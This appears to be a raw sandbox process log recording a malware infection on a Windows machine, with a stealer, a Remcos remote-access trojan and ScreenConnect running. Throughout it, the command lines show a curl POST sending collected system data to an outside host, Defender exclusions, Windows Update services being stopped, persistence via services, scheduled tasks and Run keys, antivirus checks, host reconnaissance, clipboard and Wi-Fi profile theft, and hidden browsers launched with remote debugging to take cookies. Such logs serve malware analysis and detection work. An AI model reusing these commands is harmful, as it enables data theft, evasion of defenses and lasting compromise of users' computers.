C:\Users\Admin\AppData\Local\Temp\Files\c3.exe
"C:\Users\Admin\AppData\Local\Temp\Files\c3.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C46696C65735C4D3569465232302E657865" -X POST -H "X-Auth: 2F47554D4C4E4C46452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\AppData\Local\Temp\Files\pfntjejghjsdkr.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pfntjejghjsdkr.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 82EBABD0359BB19B907B788469303A45 E Global\MSI0000
C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fnback9636.site&p=8041&s=dff84209-b7dc-448b-8fd8-d772cabe318e&k=BgIAAACkAABSU0ExAAgAAAEAAQA9jYIrttwwC%2fVG8pSgng7hOaOxKOcglvdFFtkWeOWtX8fqsZgIKfVrWuN3su1CgiFbvlCYAExDue6opAYsm4ZcU%2fXlAy9prKBw8dHgYIr5MKTVcZ179o9h8%2f%2bnJY4jOeDKVmcK57L%2fEAFTuKdJ4YjAwIneAffDLjer1Vf%2banxJ%2b%2fQG9GXKFTsCbQPC0DPoXGR4nhNlJsUIT37D9pxvtL82%2fbs5OFG6ebhQ2MBDFYY21oOxjFRMMIWi2Owda95WULvij7v9vchg4Zacetd90xJGtyFFMUL53dS%2fRJ%2bjUcnwVvLNyKx3HwIoiBSP6LM2Nm5EN5LWd0R%2b3hStk2Qltk%2bh"
C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsClient.exe" "RunRole" "cce1306d-e7ab-4219-bf52-82c99d2b1aa6" "User"
C:\Users\Admin\AppData\Local\Temp\Files\key.exe
"C:\Users\Admin\AppData\Local\Temp\Files\key.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1468 -ip 1468
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 360
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe" & rd /s /q "C:\ProgramData\U3E3EC2VAAAI" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\AppData\Local\Temp\Files\%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe
"C:\Users\Admin\AppData\Local\Temp\Files\%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe"
C:\Users\Admin\AppData\Local\Temp\Files\gagagggagagag.exe
"C:\Users\Admin\AppData\Local\Temp\Files\gagagggagagag.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "PPTBMYWF"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "PPTBMYWF" binpath= "C:\ProgramData\wxiftyzsteng\qpgcxlhnvaqc.exe" start= "auto"
C:\Windows\System32\Wbem\wmic.exe
wmic nic where NetEnabled='true' get MACAddress,Name
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\uzfvalidate.exe
C:\Users\Admin\AppData\Local\Temp\uzfvalidate.exe
C:\Users\Admin\AppData\Local\Temp\Files\ellaam.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ellaam.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\Files\szo0xbx8.exe
"C:\Users\Admin\AppData\Local\Temp\Files\szo0xbx8.exe"
C:\Users\Admin\AppData\Local\Temp\Files\t.exe
"C:\Users\Admin\AppData\Local\Temp\Files\t.exe"
C:\Users\Admin\AppData\Local\Temp\Files\armadegon.exe
"C:\Users\Admin\AppData\Local\Temp\Files\armadegon.exe"
C:\Users\Admin\AppData\Local\Temp\Files\q1wnx5ir.exe
"C:\Users\Admin\AppData\Local\Temp\Files\q1wnx5ir.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5644 -ip 5644
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 440
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5976 -ip 5976
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5976 -s 224
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\Files\armadegon.exe
"C:\Users\Admin\AppData\Local\Temp\Files\armadegon.exe"
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\Files\m.exe
"C:\Users\Admin\AppData\Local\Temp\Files\m.exe"
C:\Users\Admin\AppData\Local\Temp\Files\GoogleUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\Files\GoogleUpdate.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Program Files\Google\Chrome\Application\ZZWJ0PS30NZECMN1L7UMRQE.exe
"C:\Program Files\Google\Chrome\Application\ZZWJ0PS30NZECMN1L7UMRQE.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Dk Dk.cmd & Dk.cmd & exit
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 217412
C:\Windows\SysWOW64\findstr.exe
findstr /V "PlasmaProfessionalConstitutesGuide" Cheaper
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Mailing + Violin + Ethernet + Operated + Lunch + Useful 217412\N
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif
Possibly.pif N
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif
C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe
"C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\Files\Channel1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Channel1.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\Files\build11.exe
"C:\Users\Admin\AppData\Local\Temp\Files\build11.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_4828_133785306684546397\stub.exe
C:\Users\Admin\AppData\Local\Temp\Files\build11.exe
C:\Users\Admin\AppData\Local\Temp\Files\MYNEWRDX.exe
"C:\Users\Admin\AppData\Local\Temp\Files\MYNEWRDX.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\Files\stealc_default2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\stealc_default2.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM "taskmgr.exe""
C:\Windows\system32\taskkill.exe
taskkill /F /IM "taskmgr.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "schtasks /query /TN "MonsterUpdateService""
C:\Windows\system32\schtasks.exe
schtasks /query /TN "MonsterUpdateService"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "schtasks /create /f /sc onlogon /rl highest /tn "MonsterUpdateService" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "MonsterUpdateService" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "schtasks /create /f /sc hourly /mo 1 /rl highest /tn "MonsterUpdateService2" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc hourly /mo 1 /rl highest /tn "MonsterUpdateService2" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Monster Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe" /f"
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Monster Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\Files\GREENpackage.exe
"C:\Users\Admin\AppData\Local\Temp\Files\GREENpackage.exe"
C:\Windows\system32\HOSTNAME.EXE
hostname
C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get caption,description,providername
C:\Windows\system32\net.exe
net user
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
C:\Windows\system32\query.exe
query user
C:\Windows\system32\quser.exe
"C:\Windows\system32\quser.exe"
C:\Windows\system32\net.exe
net localgroup
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup
C:\Windows\system32\net.exe
net localgroup administrators
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
C:\Users\Admin\AppData\Local\Temp\Files\file.exe
"C:\Users\Admin\AppData\Local\Temp\Files\file.exe"
C:\Windows\system32\net.exe
net user guest
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user guest
C:\Windows\system32\net.exe
net user administrator
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user administrator
C:\ProgramData\tst\remcos.exe
"C:\ProgramData\tst\remcos.exe"
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\System32\Wbem\WMIC.exe
wmic startup get caption,command
C:\Windows\system32\tasklist.exe
tasklist /svc
C:\Windows\system32\ipconfig.exe
ipconfig /all
C:\Windows\system32\ROUTE.EXE
route print
C:\Windows\system32\ARP.EXE
arp -a
C:\Windows\system32\NETSTAT.EXE
netstat -ano
C:\Windows\system32\sc.exe
sc query type= service state= all
C:\Windows\system32\netsh.exe
netsh firewall show state
C:\Windows\system32\netsh.exe
netsh firewall show config
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\Files\main.exe
"C:\Users\Admin\AppData\Local\Temp\Files\main.exe"
C:\Users\Admin\AppData\Local\Temp\Files\main.exe
"C:\Users\Admin\AppData\Local\Temp\Files\main.exe"
C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe
"C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffd2eebcc40,0x7ffd2eebcc4c,0x7ffd2eebcc58
C:\Users\Admin\AppData\Local\Temp\Files\8fc809.exe
"C:\Users\Admin\AppData\Local\Temp\Files\8fc809.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1840,i,1245473809664630309,2713031136732994960,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1836 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --no-appcompat-clear --field-trial-handle=1896,i,1245473809664630309,2713031136732994960,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1908 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=1992,i,1245473809664630309,2713031136732994960,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2012 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe
"C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2832,i,1245473809664630309,2713031136732994960,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2852 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2864,i,1245473809664630309,2713031136732994960,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2900 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Users\Admin\AppData\Local\Temp\Files\inlandsPom.exe
"C:\Users\Admin\AppData\Local\Temp\Files\inlandsPom.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe'; Add-MpPreference -ExclusionProcess 'wefhrf'; Add-MpPreference -ExclusionPath 'C:\Users\Admin'"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\Files\newbundle2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\newbundle2.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\Files\zq6a1iqg.exe
"C:\Users\Admin\AppData\Local\Temp\Files\zq6a1iqg.exe"
C:\Users\Admin\AppData\Local\Temp\Files\file1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\file1.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
